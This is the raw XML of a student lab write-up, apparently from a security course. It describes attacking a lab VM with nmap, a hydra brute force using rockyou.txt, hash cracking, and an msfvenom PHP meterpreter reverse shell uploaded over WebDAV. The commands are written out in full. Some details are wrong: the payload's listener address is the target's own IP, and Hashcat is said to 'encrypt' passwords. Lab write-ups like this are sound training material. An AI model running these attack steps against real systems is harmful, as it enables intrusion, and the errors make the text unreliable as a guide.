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3469A" w14:textId="77777777" w:rsidR="005E5E6A" w:rsidRDefault="00A139E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Planning an Engagement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B88047" w14:textId="77777777" w:rsidR="00A139E9" w:rsidRDefault="00A139E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="581DE0B5" w14:textId="77777777" w:rsidR="00A139E9" w:rsidRDefault="00A139E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>“How do you plan and execute an effective offensive engagement?”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D427372" w14:textId="77777777" w:rsidR="00A139E9" w:rsidRDefault="00A139E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4953A146" w14:textId="77777777" w:rsidR="00126883" w:rsidRDefault="00A139E9">
      <w:r>
        <w:tab/>
        <w:t>In the next few paragraphs we will look at what it takes to plan and execute an effective offensive engagement. In Project 2 there were 3 VMs on the network. The first VM, the Kali “attack”</w:t>
      </w:r>
      <w:r w:rsidR="00126883">
        <w:t xml:space="preserve"> VM, this is the VM I</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> used to do the attacking and it’s IP address is 192.168.1.90. The second VM</w:t>
      </w:r>
      <w:r w:rsidR="00126883">
        <w:t>, the Capstone VM, was the VM I was</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> attacking and it’s IP address is 192.168.1.105. The third and final VM, the ELK Server, is the VM server that all of the Capstone logs are sent to and it’s IP address is 192.168.1.100. The goal of infiltrating the Capstone VM was to connect to it via a WebDAV connection and find and capture a flag. </w:t>
      </w:r>
      <w:r w:rsidR="00126883">
        <w:t xml:space="preserve">In this </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00126883">
        <w:t>attack</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00126883">
        <w:t xml:space="preserve"> I used </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00126883">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00126883">
        <w:t xml:space="preserve"> to scan the network to find the IP address of the VM I was attacking</w:t>
      </w:r>
      <w:r w:rsidR="00975CF2">
        <w:t>, and to see what ports were open. From this I found that port 80 was open</w:t>
      </w:r>
      <w:r w:rsidR="00126883">
        <w:t xml:space="preserve">. I also used a web browser to navigate to the web page, using the Capstone’s VM IP, to access the company’s directories that were stored on the web server. I used hydra to brute force the login pages and obtain login credentials. Once into the secret folder I used </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00126883">
        <w:t>crackstation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00126883">
        <w:t xml:space="preserve"> to crack the provided hash. I then used </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00126883">
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00126883">
        <w:t xml:space="preserve"> to create a custom web shell and then </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00126883">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00126883">
        <w:t xml:space="preserve"> to open a connection to the target. </w:t>
      </w:r>
      <w:r w:rsidR="00975CF2">
        <w:t xml:space="preserve">The only security measures I came across on this network were the password protected directories. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285ED180" w14:textId="77777777" w:rsidR="00975CF2" w:rsidRDefault="00975CF2"/>
    <w:p w14:paraId="5897D186" w14:textId="77777777" w:rsidR="00436134" w:rsidRDefault="00975CF2">
      <w:r>
        <w:tab/>
        <w:t>As stated abo</w:t>
      </w:r>
      <w:r w:rsidR="00437373">
        <w:t xml:space="preserve">ve, I used </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00437373">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00437373">
        <w:t xml:space="preserve"> to find the necessary info about the target machine. The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00437373">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00437373">
        <w:t xml:space="preserve"> scan I used was </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00437373">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00437373">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.1.0/24 –v</w:t>
      </w:r>
      <w:r w:rsidR="00437373">
        <w:t xml:space="preserve">. From this </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00437373">
        <w:t>scan</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00437373">
        <w:t xml:space="preserve"> I saw that port 80 was open on 192.168.1.105. I then typed the IP 192.168.1.105 into a web browser and it took me to the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00437373">
        <w:t>company_folders</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00437373">
        <w:t xml:space="preserve"> directory and in this I found that the hidden directory was in this location, </w:t>
      </w:r>
      <w:r w:rsidR="00437373">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>192.168.1.105/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00437373">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>company_folders</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00437373">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00437373">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>secret_folder</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00437373">
        <w:t xml:space="preserve">. Then searched on the web to see where rockyou.txt.gz lives on a Linux machine. This is the file where all the user names and passwords live. I then used </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00437373">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>gunzip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00437373">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> rockyou.txt.gz </w:t>
      </w:r>
      <w:r w:rsidR="00437373">
        <w:t xml:space="preserve">to unzip the file, then ran a hydra command to brute force the login to the secret folder. The hydra command I used was, </w:t>
      </w:r>
      <w:r w:rsidR="00437373">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">hydra –l </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00437373">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ashton</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00437373">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> –P rockyou.txt –s 80 –f –</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00437373">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>vV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00437373">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.1.105 http-get</w:t>
      </w:r>
      <w:r w:rsidR="00727E4D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00727E4D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>company_folders</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00727E4D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00727E4D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>secret_folder</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00727E4D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00727E4D">
        <w:t xml:space="preserve">. Once past the login I was able to find the WebDAV login instructions which provided a hash. I pasted that hash into </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00727E4D">
        <w:t>crackstation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00727E4D">
        <w:t xml:space="preserve"> to get the password for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00727E4D">
        <w:t>ryan’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00727E4D">
        <w:t xml:space="preserve"> account, which was the username the WebDAV instructions said to use. Once logged into WebDAV I used the file system and searched for </w:t>
      </w:r>
      <w:r w:rsidR="00727E4D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>dav://192.168.1.105/webdav</w:t>
      </w:r>
      <w:r w:rsidR="00727E4D">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="0089160A">
        <w:t xml:space="preserve">After gaining successful entry into WebDAV I wrote </w:t>
      </w:r>
      <w:r w:rsidR="00436134">
        <w:t>a reverse payload</w:t>
      </w:r>
      <w:r w:rsidR="0089160A">
        <w:t xml:space="preserve"> PHP script using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0089160A">
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0089160A">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00436134">
        <w:t xml:space="preserve">The script I used was, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00436134">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00436134">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> –p </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00436134">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00436134">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00436134">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00436134">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00436134">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00436134">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> LHOST=192.168.1.105 LPORT=4444 &gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00436134">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>shell.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00436134">
        <w:t xml:space="preserve">. I then ran the exploit in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00436134">
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00436134">
        <w:t xml:space="preserve">. After the reverse shell was successfully created I moved the file into the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00436134">
        <w:t>WevDAV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00436134">
        <w:t xml:space="preserve"> directory. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00436134">
        <w:t>Next</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00436134">
        <w:t xml:space="preserve"> I went to the webpage </w:t>
      </w:r>
      <w:r w:rsidR="00436134">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>192.168.1.105/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00436134">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>webdav</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00436134">
        <w:t xml:space="preserve"> and clicked the shell file to run it. Then, back in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00436134">
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00436134">
        <w:t xml:space="preserve"> I ran the command </w:t>
      </w:r>
      <w:r w:rsidR="00436134">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r w:rsidR="00436134">
        <w:t xml:space="preserve"> to open a bash shell. I then had successful access onto the Capstone VM. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534DDA18" w14:textId="77777777" w:rsidR="00436134" w:rsidRDefault="00436134"/>
    <w:p w14:paraId="6CB4B171" w14:textId="77777777" w:rsidR="00975CF2" w:rsidRPr="00436134" w:rsidRDefault="006E49EC">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">The brute force method I used </w:t>
      </w:r>
      <w:r w:rsidR="00D66701">
        <w:t xml:space="preserve">to gain the login information to the secret_folder was the only method that was </w:t>
      </w:r>
      <w:r w:rsidR="002811A0">
        <w:t xml:space="preserve">easily </w:t>
      </w:r>
      <w:r w:rsidR="00D66701">
        <w:t>dete</w:t>
      </w:r>
      <w:r w:rsidR="002811A0">
        <w:t xml:space="preserve">ctable by monitoring solutions. </w:t>
      </w:r>
      <w:r w:rsidR="005F295C">
        <w:t xml:space="preserve">Instead of using a brute force method to obtain the login credentials I could have used a tool like </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AB5A93">
        <w:t>Hashcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F631B3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D91CC2">
        <w:t xml:space="preserve">to encrypt the passwords. Obtaining the passwords this way would have been a little stealthier. </w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="00975CF2" w:rsidRPr="00436134" w:rsidSect="0043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E9"/>
    <w:rsid w:val="000C5E94"/>
    <w:rsid w:val="00126883"/>
    <w:rsid w:val="002811A0"/>
    <w:rsid w:val="00435DE2"/>
    <w:rsid w:val="00436134"/>
    <w:rsid w:val="00437373"/>
    <w:rsid w:val="00494F41"/>
    <w:rsid w:val="005F295C"/>
    <w:rsid w:val="006E49EC"/>
    <w:rsid w:val="00727E4D"/>
    <w:rsid w:val="0089160A"/>
    <w:rsid w:val="00975CF2"/>
    <w:rsid w:val="00A139E9"/>
    <w:rsid w:val="00AB5A93"/>
    <w:rsid w:val="00C74F4F"/>
    <w:rsid w:val="00D66701"/>
    <w:rsid w:val="00D91CC2"/>
    <w:rsid w:val="00F6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507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511</Words>
  <Characters>2914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Stephens</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Anthony Stephens</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-04-04T03:31:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-04-04T05:27:00Z</dcterms:modified>
</cp:coreProperties>
</file>